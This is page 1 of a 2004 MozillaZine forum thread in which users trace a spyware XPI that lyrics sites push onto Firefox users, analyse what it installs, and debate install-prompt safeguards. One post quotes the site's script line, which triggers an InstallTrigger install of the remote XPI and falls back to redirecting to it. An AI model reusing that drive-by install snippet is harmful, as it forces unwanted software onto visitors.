We got another XPISpyware
47 posts • Page 1 of 4 • 1, 2, 3, 4
April 3rd, 2004, 9:53 am
http://www.musicsonglyrics.com/T/Thursd ... lyrics.htm
Its there alright. I could only get it to popup once. but after diging through the source its in a extrenal js file. It grabs the XPI from: http://www2.flingstone.com/cab/sbc_netscape.xpi You can find the code in the 4th extrenal script call, the one with all the characters. I would just paste it here but I dont know the legality in pasting their code. Mindjunk
I didn't hear no bell...
April 3rd, 2004, 10:47 am
I poked around xpi a bit. Here's the summary:
Xpi contains sbc_netscape.exe, it installs program called Bridge, which hijacks IE. Associated somehow with www.blazefind.com. "No good deed goes ever unpunished"
http://archonon.sytes.net
April 3rd, 2004, 11:24 am
Oh the irony....an xpi for mozilla to hijack IE. I hope Fx can't be hijacked as easily as IE. And now we have to get serious about what to do with these malicious XPIs T__T
April 3rd, 2004, 11:34 am
see my proposed answer here
http://forums.mozillazine.org/viewtopic ... 828#463828
April 3rd, 2004, 2:01 pm
Here is what bridge is
http://www.kephyr.com/spywarescanner/li ... ndex.phtml Mindjunk
I didn't hear no bell...
April 3rd, 2004, 6:06 pm
unless someone blindly changes the xpinstall.* defaults, it's not a problem.
April 3rd, 2004, 7:27 pm
I disagree, there are people who hit accept for everything. The best solution is to simply disable it by default as per Bug 234068. This does not mean we shouldn't take further measures like having signed controls and making it so you can only install by clicking a link (both current bugs) as well as whitelists and blacklists.
April 3rd, 2004, 7:38 pm
iirc recent builds dont allow xpi installation unless the user specicially clicks on a link, so they wont popup when a page loads.
Extensions are a key part of firefox, and disabling them by default because a few sites may install spyware will probably cause more pain. Users will turn on xpiinstall to install their extensions and leave it on anyway. <a href="http://users.bigpond.net.au/nexx1/oxpmenu/" title="Office XP Menus">Office XP Menus</a> || <a href="http://scragz.com/tech/mozilla/firefox-unofficial-branding.php"> Unofficial Firefox Branding</a>
April 3rd, 2004, 9:27 pm
I actually agree with the disable by default... the people that turn it on and leave it on most likely understand what extensions are... atleast enough to know that they need to turn that option on. What I am concerned about is the newb user that the first time that see that popup is on a spywared site and wont know what to do, they my just press install. Try to remember that most people wont know what or even use extensions once fx starts getting mass deployment, everyone here uses extensions but we arent average users.
Mindjunk
I didn't hear no bell...
April 3rd, 2004, 10:48 pm
I'd like to see a message box like AnonEmoose suggested, something along the lines of...
"This page is attempting to install [software name] on your computer using the Mozilla Installer. Software is potentially dangerous and can cause damage to your computer. In order to minimize the potential risk, you should only install software you have requested, from vendors you trust. If you understand this and wish to continue the installation, press INSTALL. If you do not understand this or did not request the software, press CANCEL." ...with the 'critical' icon on the prompt. Shelumi`El Jordan S.D.G "[M]en are usually satisfied with bad argument only when their convictions rest on other grounds." --John Oman
April 4th, 2004, 4:15 pm
Well said & it's worth repeating. We can thank Micro$oft again for some of the bad habits users develope, very few MS drivers are signed by MS so folks just tend to accept everything despite the warning. Signed Packages with md5sums, Approved Sources (white/black lists), and legitimate Quality Controls on mirrors which scan for virus/spyware/malware infections on the software they distribute. There are several similar threads in these forums. Here is one I wrote to try & summarize the problems with extensions from a sysadmin's point of view... Extension Manager with AutoUpdate - MozillaZine Forums http://forums.mozillazine.org/viewtopic.php?t=63373
April 4th, 2004, 5:24 pm
I submitted the following to the devs at SpybotS&D via this link...
SpybotS&D: Contact - Detections http://www.safer-networking.org/index.p ... detections Name: wildman, Email address: guess_or_pm_me@pobox.com Email subject: Mozilla/Firefox XPI apps Report file: http://www2.flingstone.com/cab/sbc_netscape.xpi Hope you can find the time to visit the MozillaZine Forums & participate in this discussion... We got another XPISpyware - MozillaZine Forums - http://forums.mozillazine.org/viewtopic.php?t=66531 ...and possibly support/contribute anti-spyware sollutions to thier project in the form of a SpyBot plugin/extension. I made a similar comment on a Moz related blog recently, that may interest you. Robert Accettura: Spyware Blaster Supports Mozilla http://robert.accettura.com/archives/000347.shtml
April 5th, 2004, 7:49 am
Just had it pop up at another site, same spyware though
http://www.lyricsdomain.com/2/brand_new/ Mindjunk
I didn't hear no bell...
April 5th, 2004, 8:15 am
I'm using the 20040403 build and it still tries to install.. :/ there's some kind of stupid script trying to do that I guess, it's not in the html itself (I think)..
April 5th, 2004, 9:01 am
aye its a extrenal script,
trys InstallTrigger.install({'Free Access Plugin 1.117' : 'http://www2.flingstone.com/cab/sbc_netscape.xpi'}); and if that fails location.replace('http://www2.flingstone.com/cab/sbc_netscape.xpi'); } and I am using the newest build and still its happening. Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7b) Gecko/20040404 Firefox/0.8.0+ (mmoy-O2-GL7-SSE2-crc32-gifalloc) Mindjunk
I didn't hear no bell...
47 posts Page 1 of 4 • 1, 2, 3, 4
Who is onlineUsers browsing this forum: Google Feedfetcher and 7 guests |
|
